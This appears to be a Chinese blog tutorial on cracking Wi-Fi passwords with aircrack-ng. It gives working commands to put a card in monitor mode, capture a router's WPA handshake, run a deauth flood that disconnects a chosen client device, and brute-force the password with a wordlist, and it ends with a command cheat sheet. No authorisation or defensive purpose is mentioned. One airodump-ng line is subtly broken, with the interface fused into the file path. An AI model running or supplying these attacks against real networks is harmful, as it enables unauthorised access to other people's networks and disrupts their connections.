用aircrack-ng破解 wifi 密码
在开始之前,首先需要连接无线网卡。因为在虚拟机中的Kali系统不会使用笔记本自带的无线网卡,所以我们需要一个外接的无线网卡,并将其连接到Kali系统中。使用命令"ifconfig -a"来查看网卡信息,如果出现了"wlan0",则说明网卡已经适配成功。如果没有出现,可能是由于驱动问题导致的。
接下来,我们需要开启monitor模式。在这个过程中,可能会有一些进程会影响到monitor模式的开启。如果成功开启了monitor模式,则可以忽略这些进程,否则需要按照提示进行相应的操作。按照提示操作的结果是:监听网络,然后使用Ctrl+C退出。以下是一些主要参数的说明:
- BSSID:路由器或AP的MAC地址
- PWR:信号强度,数值越小表示信号越强
- Data:传输的数据大小,较大的值可能表示正在进行下载或观看视频等操作
- CH:无线信道,需要注意选择正确的信道
- ENC:加密协议,WPA2协议已经暴露出重大安全漏洞,现已有WPA3协议,期待更新
- ESSID:无线网络的名称,如果有中文可能会出现乱码
第三步,我们已经确定了目标,现在开始监听并获取cap包。在这个过程中,需要让连接到目标网络的设备重新连接,以便我们可以抓取握手包。可以耐心等待设备重新连接,或者使用deauth洪水攻击。以下是具体操作步骤:
root@huan:~# airodump-ng -c 9 --bssid 78:11:DC:10:4F:66 -w /root/桌面/wuxianpj/handshake/wlan0mon // -w 后面的路径是存放握手包的位置
第四步,另开一个窗口,我们使用deauth洪水攻击,让其中的一台设备掉线。一旦设备掉线,它会自动重新连接(除非用户在Wi-Fi设置中取消了自动连接)。
root@huan:~# aireplay-ng -0 20 -c 6C:88:14:F2:47:8C -a 78:11:DC:10:4F:66 wlan0mon // -0 表示使用deauth模式,20表示攻击次数,也可以设为0,表示持续攻击 // -c 后面是连接设备的MAC地址,我们指定它,让它稳稳地掉线
第五步,看图,不废话。
第六步,我们来使用字典攻击(关键步骤),让它慢慢破解密码。
root@huan:~# aircrack-ng -w /root/桌面/wuxianpj/zidian/wordlist.txt /root/桌面/wuxianpj/handshake/-02.cap
第七步,完成后别忘了退出monitor模式。
aircrack-ng 爆破Wi-Fi密码 - 命令清单:
~# airmon-ng start [网卡] // 开启monitor模式 ~# airodump-ng [网卡] // 捕获附近的Wi-Fi信息 ~# airodump-ng -c [信道] --bssid [路由器MAC] -w [handshake-path] [网卡] ~# aireplay-ng -0 [攻击次数值] -c [某连接设备MAC] -a [路由器MAC] [网卡] ~# aircrack-ng -w [字典路径] [破解的目标握手包路径] ~# airmon-ng stop [网卡] // 退出monitor模式
未完待续……
微信扫描下面二维码: